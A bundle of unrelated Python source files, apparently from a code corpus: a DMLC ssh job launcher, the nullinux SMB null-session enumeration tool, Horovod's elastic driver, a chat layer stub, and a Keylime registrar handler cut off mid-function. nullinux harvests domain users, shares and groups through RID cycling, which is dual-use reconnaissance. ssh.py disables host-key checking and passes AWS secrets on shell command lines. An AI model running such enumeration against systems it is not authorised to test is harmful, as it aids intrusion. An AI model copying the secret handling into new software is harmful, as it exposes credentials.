return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
|
ssh.py
|
#!/usr/bin/env python
"""
DMLC submission script by ssh
One need to make sure all slaves machines are ssh-able.
"""
from __future__ import absolute_import
import os, subprocess, logging
from threading import Thread
from . import tracker
def sync_dir(local_dir, slave_node, slave_dir):
"""
sync the working directory from root node into slave node
"""
remote = slave_node + ':' + slave_dir
logging.info('rsync %s -> %s', local_dir, remote)
prog = 'rsync -az --rsh="ssh -o StrictHostKeyChecking=no" %s %s' % (
local_dir, remote)
subprocess.check_call([prog], shell = True)
def get_env(pass_envs):
envs = []
# get system envs
keys = ['LD_LIBRARY_PATH', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']
for k in keys:
v = os.getenv(k)
if v is not None:
envs.append('export ' + k + '=' + v + ';')
# get ass_envs
for k, v in pass_envs.items():
envs.append('export ' + str(k) + '=' + str(v) + ';')
return (' '.join(envs))
def submit(args):
assert args.host_file is not None
with open(args.host_file) as f:
tmp = f.readlines()
assert len(tmp) > 0
hosts=[]
for h in tmp:
if len(h.strip()) > 0:
hosts.append(h.strip())
def ssh_submit(nworker, nserver, pass_envs):
"""
customized submit script
"""
# thread func to run the job
def run(prog):
subprocess.check_call(prog, shell = True)
# sync programs if necessary
local_dir = os.getcwd()+'/'
working_dir = local_dir
if args.sync_dst_dir is not None and args.sync_dst_dir != 'None':
working_dir = args.sync_dst_dir
for h in hosts:
sync_dir(local_dir, h, working_dir)
# launch jobs
for i in range(nworker + nserver):
pass_envs['DMLC_ROLE'] = 'server' if i < nserver else 'worker'
node = hosts[i % len(hosts)]
prog = get_env(pass_envs) + ' cd ' + working_dir + '; ' + (' '.join(args.command))
prog = 'ssh -o StrictHostKeyChecking=no ' + node + ' \'' + prog + '\''
thread = Thread(target = run, args=(prog,))
thread.setDaemon(True)
thread.start()
return ssh_submit
tracker.submit(args.num_workers, args.num_servers,
fun_submit=ssh_submit,
pscmd=(' '.join(args.command)))
|
nullinux.py
|
#!/usr/bin/env python3
from __future__ import print_function
import sys
import re
import argparse
import datetime
from time import sleep
from ipaddress import IPv4Network
from threading import Thread, activeCount
if sys.version_info[0] < 3:
from commands import getoutput
else:
from subprocess import getoutput
class TargetParser():
# Condensed version of IPParser using only standard libraries
regex = {
'single': re.compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"),
'range': re.compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}-\d{1,3}$"),
'cidr': re.compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,2}$"),
'dns': re.compile("^.+\.[a-z|A-Z]{2,}$")
}
def __init__(self):
self.hosts = []
def parse(self, target):
try:
self.controller(target)
return self.hosts
except Exception as e:
print_failure('Target Error: {}\n'.format(str(e)))
sys.exit(1)
def controller(self, target):
if target.endswith('.txt'):
self.fileParser(target)
elif re.match(self.regex['range'], target):
self.rangeParser(target)
elif re.match(self.regex['dns'], target):
self.hosts.append(target)
elif ',' in target:
self.multiParser(target)
else:
for ip in IPv4Network(target):
self.hosts.append(ip)
def fileParser(self, filename):
with open(filename, 'r') as f:
for line in f:
self.controller(line.strip())
def multiParser(self, target):
for t in target.strip().split(','):
self.controller(t)
def rangeParser(self, target):
a = target.split("-")
b = a[0].split(".")
for x in range(int(b[3]), int(a[1]) + 1):
tmp = b[0] + "." + b[1] + "." + b[2] + "." + str(x)
self.hosts.append(tmp)
class nullinux():
known_users = ['Administrator', 'Guest', 'krbtgt', 'root', 'bin']
domain_sid = ""
acquired_users = []
def __init__(self, username, password, verbose, output_file):
self.username = username
self.password = password
self.verbose = verbose
self.output_file = output_file
def enum_os(self, target):
cmd = "smbclient //{}/IPC$ -U {}%{} -t 1 -c exit".format(target,self.username, self.password)
for line in getoutput(cmd).splitlines():
if "Domain=" in line:
# OS info is no longer enumerated in newer Windows servers
print_success("{}: {}".format(target, line))
elif "NT_STATUS_LOGON_FAILURE" in line:
print_failure("{}: Authentication Failed".format(target))
return False
return True
def get_dom_sid(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Domain Information for: {}".format(target))
cmd = "rpcclient -c lsaquery -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "Domain Name:" in line:
print_success(line)
elif "Domain Sid:" in line:
self.domain_sid = line.split(":")[1].strip()
print_success("Domain SID: {}".format(self.domain_sid))
if not self.domain_sid:
print_failure("Could not attain Domain SID")
def create_userfile(self):
openfile = open(self.output_file, 'a')
for user in self.acquired_users:
openfile.write('{}\n'.format(user))
openfile.close()
def enum_shares(self, target):
count = 0
acquired_shares = []
smbclient_types = ['Disk', 'IPC', 'Printer']
print("\n\033[1;34m[*]\033[1;m Enumerating Shares for: {}".format(target))
cmd = "smbclient -L {} -U {}%{} -t 2".format(target, self.username, self.password)
for line in getoutput(cmd).splitlines():
if count == 0: #Print Enum Share Heading
print(" {:26} {}".format("Shares", "Comments"))
print(" " + "-" * 43)
count += 1
for t in smbclient_types: #Check if output in known share types
if t in line:
try:
if 'IPC$' in line:
print(" \\\{}\{}".format(target, "IPC$"))
acquired_shares.append("IPC$")
else:
share = line.split(t)[0].strip()
comment = line.split(t)[1].strip()
print(" \\\{}\{:15} {}".format(target, share, comment))
acquired_shares.append(share)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
if acquired_shares:
#Enumerate dir of each new share
for s in acquired_shares:
self.enum_dir(target, s)
else:
print(" ")
print_failure("No Shares Detected")
def share_header(self, target, share):
print("\n ", end='')
print_status("Enumerating: \\\%s\%s" % (target, share))
def enum_dir(self, target, share):
header_count = 0
cmd = "smbclient //{}/\'{}\' -t 3 -U {}%{} -c dir".format(target, share, self.username, self.password)
for line in getoutput(cmd).splitlines():
if "NT_STATUS" in line or "_ACCESS_DENIED" in line:
if self.verbose:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" ", end='')
print_failure(line)
elif "Domain=" in line or "blocks available" in line or "WARNING" in line or "failed:" in line or not line:
pass
else:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" "+line)
def enum_querydispinfo(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating querydispinfo for: {}".format(target))
cmd = "rpcclient -c querydispinfo -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("Name:")[0].split("Account:")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_enumdomusers(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating enumdomusers for: {}".format(target))
cmd = "rpcclient -c enumdomusers -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("[")[1].split("]")[0].strip()
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_lsa(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating LSA for: {}".format(target))
cmd = "rpcclient -c lsaenumsid -U {}%{} {}".format(self.username, self.password, target)
output = getoutput(cmd)
for line in output.splitlines():
try:
if "S-1-5-21" in line:
user_sid = "rpcclient -c 'lookupsids {}' -U {}%{} {}".format(line, self.username, self.password, target)
for x in getoutput(user_sid).splitlines():
user_account = x.split("\\")[1].split("(")[0].strip()
count = int(x.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" "+x)
else:
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
elif count > 1 and "*unknown*\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(x))
else:
print(" {:35} (Network/Local Group)".format(user_account))
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def rid_cycling(self, target, ridrange, max_threads):
print("\n\033[1;34m[*]\033[1;m Performing RID Cycling for: {}".format(target))
if not self.domain_sid:
print_failure("RID Failed: Could not attain Domain SID")
return False
# Handle custom RID range input
try:
r = ridrange.split("-")
rid_range = list(range(int(r[0]), int(r[1])+1))
except:
print_failure("Error parsing custom RID range, reverting to default")
rid_range = list(range(500, 551))
for rid in rid_range:
try:
Thread(target=self.rid_thread, args=(rid,target,), daemon=True).start()
except:
pass
while activeCount() > max_threads:
sleep(0.001)
while activeCount() > 1:
sleep(0.001)
def rid_thread(self, rid, target):
cmd = "rpcclient -c \"lookupsids {}-{}\" -U {}%{} {}".format(self.domain_sid, rid, self.username, self.password,target)
for line in getoutput(cmd).splitlines():
if "S-1-5-21" in line:
# Split output to get username/group name
user_account = line.split("\\")[1].split("(")[0].strip()
count = int(line.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
elif count > 1 and "*unknown*\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(line))
else:
print(" {:35} (Network/LocalGroup)".format(user_account))
def enum_known_users(self, target):
print("\n\033[1;34m[*]\033[1;m Testing {} for Known Users".format(target))
for user in self.known_users:
cmd = "rpcclient -c \"lookupnames {}\" -U {}%{} {}".format(user, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "S-1-5" in line:
try:
user_account = line.split(" ")[0].strip()
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users and int(line.split("User:")[1]) == 1:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_dom_groups(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Group Memberships for: {}".format(target))
cmd = "rpcclient -c enumdomgroups -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "rid:" in line:
try:
group = line.split("[")[1].split("]")[0].strip()
print_success("Group: %s" % (group))
self.enum_group_mem(target, group)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_group_mem(self, target, group):
cmd = "net rpc group members \'{}\' -U {}%{} -I {}".format(group, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("\\")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def print_success(msg):
print('\033[1;32m[+]\033[0m {}'.format(msg))
def print_status(msg):
print('\033[1;34m[*]\033[0m {}'.format(msg))
def print_failure(msg):
print('\033[1;31m[-]\033[0m {}'.format(msg))
def time_stamp():
return datetime.datetime.now().strftime('%m-%d-%Y %H:%M')
def nullinux_enum(args, scan, target):
scan.enum_os(target)
if args.users:
scan.enum_shares(target)
if args.shares:
if not scan.domain_sid:
scan.get_dom_sid(target)
scan.enum_querydispinfo(target)
scan.enum_enumdomusers(target)
if not args.quick:
scan.enum_lsa(target)
scan.rid_cycling(target, args.rid_range, args.max_threads)
scan.enum_known_users(target)
scan.enum_dom_groups(target)
def main(args):
print("\n Starting nullinux v{} | {}\n\n".format(version, time_stamp()))
scan = nullinux('\"{}\"'.format(args.username), '\"{}\"'.format(args.password), args.verbose, args.output_file)
for t in args.target:
try:
if args.rid_only:
scan.get_dom_sid(t)
scan.rid_cycling(t, args.rid_range, args.max_threads)
else:
nullinux_enum(args, scan, t)
except Exception as e:
print("\n[*] Main Error: {}\n\n".format(e))
if args.users:
print("\n\033[1;34m[*]\033[1;m {} unique user(s) identified".format(len(scan.acquired_users)))
if scan.acquired_users:
print("\033[1;32m[+]\033[1;m Writing users to file: {}\n".format(args.output_file))
scan.create_userfile()
if __name__ == '__main__':
try:
version = '5.5.0dev'
args = argparse.ArgumentParser(description=("""
nullinux | v{0}
-----------------------------------
SMB null-session enumeration tool to gather OS,
user, share, and domain information.
usage:
nullinux -users -quick DC1.demo.local,10.0.1.1
nullinux -rid -range 500-600 10.0.0.1
nullinux -shares -U 'Domain\\User' -P 'Password1' 10.0.0.1""").format(version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
args.add_argument('-v', dest="verbose", action='store_true', help="Verbose output")
args.add_argument('-o', dest="output_file", type=str, default="./nullinux_users.txt", help="Output users to the specified file")
auth = args.add_argument_group("Authentication")
auth.add_argument('-u', '-U', dest='username', type=str, default="", help='Username')
auth.add_argument('-p', '-P', dest='password', type=str, default="", help='Password')
enum = args.add_argument_group("Enumeration")
enum.add_argument('-shares', dest="shares", action='store_false', help="Enumerate shares only")
enum.add_argument('-users', dest="users", action='store_false', help="Enumerate users only")
enum.add_argument('-q', '-quick', dest="quick", action='store_true', help="Fast user enumeration")
enum.add_argument('-r', '-rid', dest="rid_only", action='store_true', help="Perform RID cycling only")
enum.add_argument('-range', dest='rid_range', type=str, default="500-550", help='Set Custom RID cycling range (Default: \'500-550\')')
enum.add_argument('-T', dest='max_threads', type=int, default=15, help='Max threads for RID cycling (Default: 15)')
args.add_argument(dest='target', nargs='+', help='Target server')
args = args.parse_args()
args.target = TargetParser().parse(args.target[0])
main(args)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
|
driver.py
|
# Copyright 2020 Uber Technologies, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import logging
import os
import queue
import threading
import time
from collections import defaultdict
from horovod.runner.common.util import hosts, timeout
from horovod.runner.elastic.discovery import HostManager
from horovod.runner.elastic.registration import WorkerStateRegistry
from horovod.runner.elastic.worker import HostUpdateResult, WorkerNotificationClient
DISCOVER_HOSTS_FREQUENCY_SECS = 1.0
ELASTIC_TIMEOUT_SECS = 600
def _epoch_time_s():
return int(time.time())
class Results(object):
def __init__(self, error_message, worker_results):
self.error_message = error_message
self.worker_results = worker_results
class ResultsRecorder(object):
def __init__(self):
self._error_message = None
self._worker_results = {}
self._worker_threads = queue.Queue()
def expect(self, worker_thread):
self._worker_threads.put(worker_thread)
def set_error_message(self, error_message):
self._error_message = error_message
def add_result(self, key, value):
if key in self._worker_results:
return
self._worker_results[key] = value
def get_results(self):
while not self._worker_threads.empty():
worker_thread = self._worker_threads.get()
worker_thread.join()
return Results(self._error_message, self._worker_results)
class ElasticDriver(object):
def __init__(self, rendezvous, discovery, min_np, max_np, timeout=None, reset_limit=None, verbose=0):
self._rendezvous = rendezvous
self._host_manager = HostManager(discovery)
self._min_np = min_np
self._max_np = max_np
self._verbose = verbose
self._host_assignments = {}
self._rank_assignments = {}
self._world_size = 0
self._wait_hosts_cond = threading.Condition()
self._timeout = timeout or int(os.getenv('HOROVOD_ELASTIC_TIMEOUT', ELASTIC_TIMEOUT_SECS))
self._create_worker_fn = None
self._worker_clients = {}
self._worker_registry = WorkerStateRegistry(self, self._host_manager, reset_limit=reset_limit)
self._results = ResultsRecorder()
self._shutdown = threading.Event()
self._discovery_thread = threading.Thread(target=self._discover_hosts)
self._discovery_thread.daemon = True
self._discovery_thread.start()
def start(self, np, create_worker_fn):
self._create_worker_fn = create_worker_fn
self._activate_workers(np)
def resume(self):
self._activate_workers(self._min_np)
def stop(self, error_message=None):
self._results.set_error_message(error_message)
self._shutdown.set()
self._rendezvous.stop()
self._discovery_thread.join()
def finished(self):
return self._shutdown.is_set()
def get_results(self):
return self._results.get_results()
def register_worker_server(self, host, slot, addresses, secret_key):
self._worker_clients[(host, slot)] = WorkerNotificationClient(
addresses, secret_key, self._verbose)
def get_worker_client(self, slot_info):
return self._worker_clients.get((slot_info.hostname, slot_info.local_rank))
def record_ready(self, host, slot):
self._worker_registry.record_ready(host, slot)
def world_size(self):
return self._world_size
def local_size(self, host):
return len(self._host_assignments[host])
def get_slot_info(self, host, slot):
return self._host_assignments[host][slot] if self.has_rank_assignment(host, slot) \
else hosts.INVALID_SLOT_INFO
def get_coordinator_info(self):
return self._rank_assignments.get(0)
def has_rank_assignment(self, host, slot):
if self._host_manager.is_blacklisted(host):
return False
return host in self._host_assignments and len(self._host_assignments[host]) > slot
@property
def host_assignments(self):
return self._host_assignments
def wait_for_available_slots(self, min_np, min_hosts=1):
extra_message = ' An elastic job also requires that at least two hosts ' \
'are available to resolve compatible network interfaces. If you know which interfaces ' \
'are compatible in your network, set `--network-interface` to skip this check.' \
if min_hosts > 1 else ''
tmout = timeout.Timeout(
self._timeout,
message='Timed out waiting for {{activity}}. Please check that you have '
'enough resources to run at least {min_np} Horovod processes.{extra_message}'
.format(min_np=min_np, extra_message=extra_message))
self._wait_hosts_cond.acquire()
try:
while True:
current_hosts = self._host_manager.current_hosts
avail_slots = current_hosts.count_available_slots()
logging.debug(f"current available slots: {avail_slots}")
avail_hosts = len(current_hosts.available_hosts)
logging.debug(f"current available hosts: {avail_hosts}.")
if avail_slots >= min_np and avail_hosts >= min_hosts:
return current_hosts
if self._shutdown.is_set():
raise RuntimeError('Job has been shutdown, see above error messages for details.')
self._wait_hosts_cond.wait(tmout.remaining())
tmout.check_time_out_for('minimum number of slots to become available')
finally:
self._wait_hosts_cond.release()
def _activate_workers(self, min_np):
logging.info('wait for available slots: {}'.format(min_np))
current_hosts = self.wait_for_available_slots(min_np)
pending_slots = self._update_host_assignments(current_hosts)
self._worker_registry.reset(self.world_size())
self._start_worker_processes(pending_slots)
def _discover_hosts(self):
first_update = True
while not self._shutdown.is_set():
self._wait_hosts_cond.acquire()
try:
update_res = self._host_manager.update_available_hosts()
if update_res != HostUpdateResult.no_update:
self._notify_workers_host_changes(self._host_manager.current_hosts, update_res)
self._wait_hosts_cond.notify_all()
except RuntimeError as e:
if first_update:
# Misconfiguration, fail the job immediately
self._shutdown.set()
self._wait_hosts_cond.notify_all()
raise
# Transient error, retry until timeout
logging.warning(str(e))
finally:
self._wait_hosts_cond.release()
first_update = False
self._shutdown.wait(DISCOVER_HOSTS_FREQUENCY_SECS)
def _notify_workers_host_changes(self, current_hosts, update_res):
next_host_assignments = {}
if current_hosts.count_available_slots() >= self._min_np:
# Assignments are required to be stable via contract
next_host_assignments, _ = self._get_host_assignments(current_hosts)
if next_host_assignments == self.host_assignments:
# Skip notifying workers when host changes would not result in changes of host assignments
logging.debug('no host assignment changes, skipping notifications')
return
coordinator_slot_info = self.get_coordinator_info()
if not coordinator_slot_info:
logging.debug('no coordinator info, skipping notifications')
return
coordinator_client = self.get_worker_client(coordinator_slot_info)
if not coordinator_client:
logging.debug('no coordinator client, skipping notifications')
return
timestamp = _epoch_time_s()
try:
coordinator_client.notify_hosts_updated(timestamp, update_res)
except:
if self._verbose >= 2:
logging.exception('failed to notify {}[{}] of host updates'
.format(coordinator_slot_info.hostname,
coordinator_slot_info.local_rank))
def _update_host_assignments(self, current_hosts):
# Determine the slots that are already filled so we do not respawn these processes
active_slots = set([(host, slot_info.local_rank)
for host, slots in self._host_assignments.items()
for slot_info in slots])
# Adjust the host assignments to account for added / removed hosts
host_assignments, host_assignments_list = self._get_host_assignments(current_hosts)
if len(self._host_assignments) > 0:
# Ensure that at least one previously active host is still assigned, otherwise there is no
# way to sync the state to the new workers
prev_hosts = self._host_assignments.keys()
next_hosts = host_assignments.keys()
if not prev_hosts & next_hosts:
raise RuntimeError('No hosts from previous set remaining, unable to broadcast state.')
self._host_assignments = host_assignments
self._world_size = len(host_assignments_list)
self._rendezvous.init(host_assignments_list)
# Rank assignments map from world rank to slot info
rank_assignments = {}
for slot_info in host_assignments_list:
rank_assignments[slot_info.rank] = slot_info
self._rank_assignments = rank_assignments
# Get the newly assigned slots that need to be started
pending_slots = [slot_info
for host, slots in self._host_assignments.items()
for slot_info in slots
if (host, slot_info.local_rank) not in active_slots]
return pending_slots
def _get_host_assignments(self, current_hosts):
# Adjust the host assignments to account for added / removed hosts
host_list = [hosts.HostInfo(host, current_hosts.get_slots(host))
for host in current_hosts.host_assignment_order]
host_assignments_list = hosts.get_host_assignments(host_list, self._min_np, self._max_np)
host_assignments = defaultdict(list)
for slot_info in host_assignments_list:
host_assignments[slot_info.hostname].append(slot_info)
return host_assignments, host_assignments_list
def _start_worker_processes(self, pending_slots):
for slot_info in pending_slots:
logging.info('start worker process: {}[{}]'.format(slot_info.hostname, slot_info.local_rank))
self._start_worker_process(slot_info)
def _start_worker_process(self, slot_info):
create_worker_fn = self._create_worker_fn
shutdown_event = self._shutdown
host_event = self._host_manager.get_host_event(slot_info.hostname)
def run_worker():
res = create_worker_fn(slot_info, [shutdown_event, host_event])
exit_code, timestamp = res
self._handle_worker_exit(slot_info, exit_code, timestamp)
thread = threading.Thread(target=run_worker)
thread.daemon = True
thread.start()
self._results.expect(thread)
def _handle_worker_exit(self, slot_info, exit_code, timestamp):
if not self.has_rank_assignment(slot_info.hostname, slot_info.local_rank):
# Ignore hosts that are not assigned a rank
logging.debug('host {} has been blacklisted, ignoring exit from local_rank={}'
.format(slot_info.hostname, slot_info.local_rank))
return
if exit_code == 0:
rendezvous_id = self._worker_registry.record_success(slot_info.hostname, slot_info.local_rank)
else:
rendezvous_id = self._worker_registry.record_failure(slot_info.hostname, slot_info.local_rank)
if self.finished() and self._worker_registry.last_rendezvous() == rendezvous_id:
logging.debug('adding results for {}[{}]: ({}, {})'
.format(slot_info.hostname, slot_info.local_rank, exit_code, timestamp))
name = '{}[{}]'.format(slot_info.hostname, slot_info.local_rank)
self._results.add_result(name, (exit_code, timestamp))
|
BotoChatLayer.py
|
import logging
import threading
from yowsup.layers import YowLayer
class BotoChatLayer(YowLayer):
def __init__(self):
super().__init__()
self.logger = logging.getLogger("botosan.logger")
def send(self, data):
threading.Thread(target=self.child()).start()
self.toLower(data)
def receive(self, data):
self.toUpper(data)
def child(self):
pass
|
registrar_common.py
|
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import threading
import sys
import base64
import configparser
import signal
import time
import hashlib
import http.server
try:
import simplejson as json
except ImportError:
raise("Simplejson is mandatory, please install")
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from keylime import registrar_client
from keylime import crypto
from keylime import cloud_verifier_common
from keylime import keylime_sqlite
from keylime import tpm_obj
from keylime import common
from keylime import keylime_logging
logger = keylime_logging.init_logging('registrar-common')
# setup config
config = configparser.ConfigParser()
config.read(common.CONFIG_FILE)
class ProtectedHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
"""HEAD not supported"""
common.echo_json_response(self, 405, "HEAD not supported")
return
def do_PATCH(self):
"""PATCH not supported"""
common.echo_json_response(self, 405, "PATCH not supported")
return
def do_GET(self):
"""This method handles the GET requests to retrieve status on agents from the Registrar Server.
Currently, only agents resources are available for GETing, i.e. /agents. All other GET uri's
will return errors. agents requests require a single agent_id parameter which identifies the
agent to be returned. If the agent_id is not found, a 404 response is returned.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('GET returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
agent = self.server.db.get_agent(agent_id)
if agent is None:
common.echo_json_response(self, 404, "agent_id not found")
logger.warning('GET returning 404 response. agent_id ' + agent_id + ' not found.')
return
if not agent['active']:
common.echo_json_response(self, 404, "agent_id not yet active")
logger.warning('GET returning 404 response. agent_id ' + agent_id + ' not yet active.')
return
response = {
'aik': agent['aik'],
'ek': agent['ek'],
'ekcert': agent['ekcert'],
'regcount': agent['regcount'],
}
if agent['virtual']:
response['provider_keys']= agent['provider_keys']
common.echo_json_response(self, 200, "Success", response)
logger.info('GET returning 200 response for agent_id:' + agent_id)
else:
# return the available registered uuids from the DB
json_response = self.server.db.get_agent_ids()
common.echo_json_response(self, 200, "Success", {'uuids':json_response})
logger.info('GET returning 200 response for agent_id list')
return
def do_POST(self):
"""POST not supported"""
common.echo_json_response(self, 405, "POST not supported via TLS interface")
return
def do_PUT(self):
"""PUT not supported"""
common.echo_json_response(self, 405, "PUT not supported via TLS interface")
return
def do_DELETE(self):
"""This method handles the DELETE requests to remove agents from the Registrar Server.
Currently, only agents resources are available for DELETEing, i.e. /agents. All other DELETE uri's will return errors.
agents requests require a single agent_id parameter which identifies the agent to be deleted.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('DELETE agent returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
if self.server.db.remove_agent(agent_id):
#send response
common.echo_json_response(self, 200, "Success")
return
else:
#send response
common.echo_json_response(self, 404)
return
else:
common.echo_json_response(self, 404)
return
def log_message(self, logformat, *args):
return
class UnprotectedHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
"""HEAD not supported"""
common.echo_json_response(self, 405, "HEAD not supported")
return
def do_PATCH(self):
"""PATCH not supported"""
common.echo_json_response(self, 405, "PATCH not supported")
return
def do_GET(self):
"""GET not supported"""
common.echo_json_response(self, 405, "GET not supported")
return
def do_POST(self):
"""This method handles the POST requests to add agents to the Registrar Server.
Currently, only agents resources are available for POSTing, i.e. /agents. All other POST uri's
will return errors. POST requests require an an agent_id identifying the agent to add, and json
block sent in the body with 2 entries: ek and aik.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('POST agent returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
common.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('POST agent returning 400 response. agent id not found in uri ' + self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
common.echo_json_response(self, 400, "Expected non zero content length")
logger.warning('POST for ' + agent_id + ' returning 400 response. Expected non zero content length.')
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
ek = json_body['ek']
ek_tpm = json_body['ek_tpm']
ekcert = json_body['ekcert']
aik = json_body['aik']
aik_name = json_body['aik_name']
tpm_version = int(json_body['tpm_version'])
# try to encrypt the AIK
tpm = tpm_obj.getTPM(need_hw_tpm=False,tpm_version=tpm_version)
(blob,key) = tpm.encryptAIK(agent_id,aik,ek,ek_tpm,aik_name)
# special behavior if we've registered this uuid before
regcount = 1
agent = self.server.db.get_agent(agent_id)
if agent is not None:
# keep track of how many ek-ekcerts have registered on this uuid
regcount = agent['regcount']
if agent['ek'] != ek or agent['ekcert'] != ekcert:
logger.warning('WARNING: Overwriting previous registration for this UUID with new ek-ekcert pair!')
regcount += 1
# force overwrite
logger.info('Overwriting previous registration for this UUID.')
# self.server.db.remove_agent(agent_id)
self.server.db.remove_agent(agent_id)
# Add values to database
d={}
d['ek']=ek
d['aik']=aik
d['ekcert']=ekcert
d['virtual']=int(ekcert=='virtual')
d['active']=int(False)
d['key']=key
d['tpm_version']=tpm_version
d['provider_keys']={}
d['regcount']=regcount
self.server.db.add_agent(agent_id, d)
response = {
'blob': blob,
}
common.echo_json_response(self, 200, "Success", response)
logger.info('POST returning key blob for agent_id: ' + agent_id)
return
except Exception as e:
common.echo_json_response(self, 400, "Error: %s"%e)
logger.warning("POST for " + agent_id + " returning 400 response. Error: %s"%e)
logger.exception(e)
return
def do_PUT(self):
"""This method handles the PUT requests to add agents to the Registrar Server.
Currently, only agents resources are available for PUTing, i.e. /agents. All other PUT uri's
will return errors.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('PUT agent returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
common.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('PUT agent returning 400 response. agent id not found in uri ' + self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
common.echo_json_response(self, 400, "Expected non zero content length")
logger.warning('PUT for ' + agent_id + ' returning 400 response. Expected non zero content length.')
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
if "activate" in rest_params:
auth_tag=json_body['auth_tag']
agent = self.server.db.get_agent(agent_id)
if agent is None:
raise Exception("attempting to activate agent before requesting registrar for %s"%agent_id)
if agent['virtual']:
raise Exception("attempting to activate virtual AIK using physical interface for %s"%agent_id)
if common.STUB_TPM:
